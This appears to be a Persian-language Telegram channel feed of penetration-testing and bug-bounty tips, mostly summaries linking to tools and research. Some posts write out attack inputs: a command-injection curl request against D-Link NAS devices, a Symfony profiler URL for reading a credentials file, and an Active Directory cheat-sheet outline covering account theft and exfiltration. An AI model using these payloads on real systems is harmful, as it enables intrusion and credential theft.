Try Hack Box
4.87K subscribers
572 photos
63 videos
79 files
602 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
🏭 اگر درگیر تست نفوذ هستید، ممکن است اغلب کنترل‌کننده‌های منطقی قابل برنامه‌ریزی (PLC)، دستگاه‌هایی که برای کنترل پروسس های صنعتی استفاده می‌شوند، در زیرساخت داخلی کلاینت پیدا کنید.

🧰 به نظر می رسد که مایکروسافت یک چارچوب منبع باز برای پزشکی قانونی چنین دستگاه هایی، به طور دقیق تر، برای تجزیه و تحلیل ابرداده و فایل های پروژه PLC دارد.

✔️ این یک راه راحت برای اسکن PLC ها و شناسایی هر گونه مصنوعات مشکوک در محیط های ICS ارائه می دهد که می تواند برای بازرسی دستی، وظایف نظارت خودکار، یا عملیات پاسخ به حادثه برای شناسایی دستگاه های در معرض خطر استفاده شود. و بله، می توان آن را مطابق با نیازهای شما سفارشی کرد.

👩‍💻 GitHub

#pentest #redteam #tools
@TryHackBox
👍3
نسخه exchange مایکروسافت را پیدا کنید

nmap -p 443 script ms-exchange-version.nse target


https://github.com/righel/ms-exchange-version-nse.git

#tools #pentest #linux
@TryHackBox
👍2
اگر مال شماست، مسیری را پیدا کنید که "neighbor" شل را در امتداد آن قرار داده است تا آن را حذف یا مشاهده کنید. سپس می توانید دستور را اجرا کنید
powershell -command "Get-Process | ForEach-Object { $_.Path }"

بیشتر از طریق
tasklist -v

بیایید PID را پیدا کنیم. و می توانید با کمک دستور  :
taskkill /PID process_id


#activedirectory #windows #pentest
@TryHackBox
تولید کننده نام کاربری دامنه فعال😈
https://github.com/w0Tx/generate-ad-username

#pentest #activedirectory #linux
@TryHackBox
💡 برگه تقلب اکتیو دایرکتوری
- مخزنی که در آن یک متدولوژی کلی برای کار در اکتیو دایرکتوری پیدا خواهید کرد. Inside مجموعه ای از دستورات سریع از مؤثرترین ابزارهای مبتنی بر Powershell، C، .Net 3.5 و .Net 4.5 است.

🥷 مخزن به روزترین نیست، اما برای مبتدیان عالی است که اصول را درک کنند.

• Recon
• Domain Enum
• Local Privilege Escalation
• Local Account Stealing
• Monitor Potential Incoming Account
• Local Account Stealing
• Admin Recon
• Lateral Movement
• Remote Administration
• Domain Admin Privileges
• Cross Trust Attacks
• Persistance and Exfiltrate

👉 GitHub

#redteam #pentest #cheatsheet
@TryHackBox
🔎 یافتن SSRF در برنامه های NextJS

تیم Assetnote یک منبع جالب دیگر دارد. مقاله جدیدی به پتانسیل وقوع SSRF در برنامه های NextJS به دلیل پیکربندی های نادرست می پردازد.

به طور خاص، روی مؤلفه _next/image تمرکز می‌کند و نشان می‌دهد که چگونه مهاجمان می‌توانند از این نقاط ضعف برای انجام حملات SSRF، از جمله توضیح دقیق دور زدن امنیتی و آسیب‌پذیری SSRF اخیراً کشف شده، که به CVE-2024-34351 اختصاص داده شده است، سوء استفاده کنند.


#pentest #bugbounty
https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps
@TryHackBox
💡 اگر در حین باگ بانتی / تست نفوذ با یک برنامه وب در Symfony مواجه شدید، وجود حالت اشکال زدایی ( /app_dev.php ) و توانایی خواندن پیکربندی را بررسی کنید:

/app_dev.php/_profiler/open?file=app/config/parameters.yml


#tips #bugbounty #pentest
@TryHackBox
👍6
🔥 وقتی در مورد امنیت سمت کلاینت صحبت می کنیم، XSS و چندین حمله محبوب دیگر به ذهن خطور می کند. اما باور کنید، دنیای حملات سمت مشتری بسیار گسترده تر است. خودتان در این راهنمای جامع ببینید:

1. XSS (Cross-Site Scripting)
2. CSP (Content Security Policy)
3. Sanitization
4. HTML injection
5. CSS injection
6. DOM clobbering
7. Prototype pollution
8. CSRF (Cross-site request forgery)
9. CORS (Cross-origin resource sharing)
10. Cookie tossing
11. Cookie bomb
12. Clickjacking
13. MIME sniffing
14. XSLeaks (Cross-site leaks)
15. CSTI (Client-side template injection)
16. Subdomain takeover
17. Dangling markup injection
18. Supply chain attack

#bugbounty #pentest
@TryHackBox
👍2
👹 هیولاها در کد شما - GitHub Actions Cache Poisoning

آیا دوست دارید باگ های پیچیده چند مرحله ای را بررسی کنید؟ سپس این نوشته برای شماست. نویسنده تکنیکی را برای افزایش دسترسی و حرکت جانبی در GitHub Actions توصیف می کند که آن را "Actions Cache Blasting" می نامد.

بخوانید

#pentest #bugbounty #writeup
@TryHackBox
👍2
Pentest GPT

دستیار هوش مصنوعی که می تواند ابزارهای مختلف #pentest را اجرا کند. به صورت رایگان در دسترس است:

- CVEMap
- زیر دامنه یاب
- لینک یاب
- آشکارساز WAF
- جستجوی Whois


دستورات ترمینال Nuclei، SQLi Exploiter، Katana و Linux در نسخه PRO موجود هستند.

pentestgpt.ai
@TryHackBox
🔥2
🔖  تیم PortSwigger ابزار SignSaboteur را معرفی کرده است که با آن می توانید به راحتی توکن های وب امضا شده را جعل کنید.

توکن های وب امضا شده به طور گسترده برای احراز هویت و مجوز stateless در وب استفاده می شوند. محبوب‌ترین فرمت JSON است، اما فراتر از آن، اکوسیستم استانداردهای پر رونقی وجود دارد که هرکدام دارای پیاده‌سازی خاص خود از ذخیره‌سازی داده و امنیت هستند.

ابزار جدید برای کمک به ارزیابی آنها طراحی شده است. این طراحی شده است تا حملات ذکر شده را خودکار کند و تضمین کند که دیگر پیکربندی های ناامن را از دست ندهید.

اطلاعیه
https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease

#pentest #tools
@TryHackBox
👍3🔥2
🥷 IDOR :
راهنمای کامل برای بهره برداری از آسیب پذیری های پیچیده IDOR

با کمک این راهنما، یاد می گیرید که IDOR های ساده و پیچیده را شناسایی و کار کنید.

بخوانید


#guide #pentest #bugbounty@TryHackBox

@TryHackBox
👍2
5️⃣ راه های آسان برای هک یک برنامه وب با استفاده از GraphQL

اگر endoint مورد نظر را پیدا کرده اید (به عنوان مثال، /graphql )، ممکن است چندین گزینه برای exploitation بیشتر وجود داشته باشد:

🔷 Introspection query enabled
🔷 Introspection field suggestions
🔷 GET/POST based CSRF
🔷 Bypassing rate limits
🔷 Denial of service through batched queries

و بله، این یک لیست جامع نیست. این راهنما، در میان چیزهای دیگر، ابزارهایی را فهرست می‌کند که کار دستی را خودکار می‌کنند.

https://blog.intigriti.com/2024/05/31/five-easy-ways-to-hack-graphql-targets/

#pentest #bugbounty #guide
@TryHackBox
👍1
🐙 Osmedeus
— یک موتور Go برای امنیت تهاجمی است. این ابزار برای ایجاد یک زیرساخت با قابلیت‌ها و انعطاف‌پذیری طراحی شده که به کاربران اجازه می‌دهد یک سیستم اطلاعاتی سفارشی ایجاد کرده و آن را روی تعداد زیادی از اهداف راه‌اندازی کنند.
bash <(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)


👉 GitHub

#recon #pentest
@TryHackBox
👏2
🔍 50 موتور جستجو برای هکرهای اخلاقی

#tools #pentest
@TryHackBox
👍31
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 یکی از ساده ترین راه ها برای پیدا کردن SQL injection با استفاده از جستجوی کد Github

➡️همان مثال برای SSRF:
/file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/

/(subprocess|exec|spawn|system).*chrome.*--headless/

#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍7👏2🤩2🔥1
🔥 در ابزار Nuclei روش جدیدی برای تشخیص حملات XSS اضافه شده است!

در این راهنما، استفاده از حالت headless در nuclei برای تشخیص ساده‌تر و دقیق‌تر XSS با استفاده از عملگر waitdialog توضیح داده شده است. این روش به طور قابل توجهی پیچیدگی مقایسه پاسخ‌های سرور را کاهش می‌دهد و در عین حال دقت بالایی را حفظ می‌کند.

🔹 مطالعهٔ راهنما
#guide #bugbounty #pentest
@TryHackBox
👍13
🧐 آیا قبلاً خواسته‌اید به سرعت باگ‌های «HTTP Request Smuggling» را تست کنید؟

Smuggler
یک ابزار خودکار است که به شما در تشخیص آسیب‌پذیری‌های HTTP request smuggling و همچنین HTTP desync کمک می‌کند. دقت کنید، این ابزار ممکن است در برخی موارد نتیجه فالس (غلط) اعلام کند، به خاطر ذات پیچیده همین آسیب‌پذیری.

👉 GitHub

#tools #pentest #bugbounty
@TryHackBox
👍61
🔥 به تحقیق در مورد امنیت وردپرس علاقه دارید؟

محقق امنیتی، آناندا داکال، روش خود را برای پیدا کردن تزریق SQL غیرمجاز در افزونه WooCommerce Wishlist وردپرس شرکت TI به اشتراک می‌گذارد.

https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
#pentest #bugbounty #bestpractices
@TryHackBox
2
🥷 تزریق فرمان در پارامتر NAME برای D-Link NAS

اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیره‌سازی داده‌های شبکه، که بیش از ۶۰٬۰۰۰ عدد از آن‌ها از طریق اینترنت در دسترس هستند.

یک باگ بسیار ساده که می‌توان با فازبندی ساده پیدا کرد:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
🔥5